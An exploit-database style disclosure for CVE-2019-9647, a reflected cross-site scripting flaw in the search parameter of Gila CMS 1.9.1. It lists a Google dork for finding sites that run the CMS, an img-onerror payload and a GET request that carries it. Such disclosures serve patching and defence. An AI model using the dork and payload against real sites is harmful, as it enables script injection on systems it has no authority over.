Exploit Title: Gila CMS (search) Cross Site Scripting

Google Dork: intext:”Powered By Gila CMS”

Date: 11.03.2019

Exploit Author: Ahmet Ümit BAYRAM

Vendor Homepage: https://gilacms.com

Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip

Demo Site: https://gilacms.com/demo/

Version: 1.9.1

Tested on: Kali Linux

CVE: CVE-2019-9647

Vulnerable Parameter: search

Payload: <–<img/src= onerror=confirm``> –!>

GET Request: http://localhost/?search=<–<img/src= onerror=confirm``> –!>